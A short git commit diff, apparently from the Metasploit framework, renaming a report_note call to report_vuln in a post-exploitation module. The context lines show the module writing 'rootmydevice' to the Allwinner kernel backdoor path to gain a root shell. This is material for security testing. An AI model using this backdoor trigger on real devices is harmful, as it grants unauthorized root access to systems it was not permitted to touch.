change report_note to report_vuln per note

bug/bundler_fix
h00die 2016-05-23 17:36:50 -04:00
parent c621f689b2
commit 4242bbdf55
1 changed files with 1 additions and 1 deletions

View File

@ -50,7 +50,7 @@ class MetasploitModule < Msf::Post
cmd_exec("echo rootmydevice > #{backdoor}")
if is_root?
print_good "Privilege Escalation Successful"
report_note(
report_vuln(
:host => session,
:type => "host.escalation",
:data => "Escalated to root shell via Allwinner backdoor"